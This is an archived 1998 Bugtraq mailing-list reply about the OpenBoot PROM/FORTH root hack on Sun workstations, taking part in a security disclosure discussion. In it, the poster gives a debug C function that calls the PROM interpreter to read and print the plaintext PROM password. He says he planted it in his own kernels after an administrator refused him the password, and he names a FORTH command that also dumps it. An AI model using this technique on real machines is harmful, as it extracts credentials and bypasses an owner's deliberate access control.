Bugtraq mailing list archives
Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53)
From: leendert () WATSON IBM COM (Leendert van Doorn)
Date: Mon, 13 Jul 1998 16:30:07 -0400
# Jericho Nunn wrote: # # > Aside from the fact that it left me quite flabbergasted for quite # >some time, mudge's OBP memory manipulation for aquiring root priviledges # >poses a serious risk for environments where SUN workstation consoles are # >easily accesible to unpriviledged individuals, such as university labs. # # This has been known for a long time. Indeed some 7 years ago whilst I # was at univeristy, and in my more "cat and mouse" gaming moods, I used # this trick and a prom password was promptly added. Given that we are on the subject of open boot prom passwords. Because of a disagreement with the person that managed the pool of Sparc stations we ran Amoeba on (he didn't want to give me the prom password but I was allowed to boot my own kernels), my own kernels contained the following piece of code: #ifndef NDEBUG /* * Print the prom password so I know what it is when debugging a kernel */ void print_password(void) { char cmd[OBP_CMDLEN], pwd[8]; int i, pwdlen; preprom(); if (obp->op_interpret) { (void) sprintf(cmd, "security-password %x swap dup %x ! move", pwd, &pwdlen); obp->op_interpret(cmd); if (pwdlen > 0) { printf("OBP Password = '"); for (i = 0; i < pwdlen; i++) printf("%c", pwd[i]); printf("'\n"); } } postprom(); } #endif /* NDEBUG */ Yes, the prom password is unencrypted. "security-password dump" will show the plaintext version. Leendert -- Leendert van Doorn <leendert () watson ibm com> IBM T.J. Watson Research Center (914) 784-7831 30 Saw Mill River Road, Hawthorne, NY 10532
Current thread:
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) James Bonfield (Jul 13)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Leendert van Doorn (Jul 13)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Aggelos P. Varvitsiotis (Jul 14)
- <Possible follow-ups>
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Dr. Mudge (Jul 13)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Darren J Moffat - SunService ETZ-N OS Product Support Group (Jul 14)
- Linux and world-writable /tmp - UPDATE (fwd) Michal Zalewski (Jul 11)
- Berkley DB problem in slackware distribution Martin Bene (Jul 16)
- Re: Linux and world-writable /tmp - UPDATE (fwd) Olaf Kirch (Jul 16)
- Re: Linux and world-writable /tmp - UPDATE (fwd) Michal Zalewski (Jul 12)
- Linux and world-writable /tmp - UPDATE (fwd) Michal Zalewski (Jul 11)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Eric Johnson (Jul 15)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Casper Dik (Jul 15)
- S.A.F.E.R. Security Bulletin 980708.DOS.1.1 Security Research Team (Jul 16)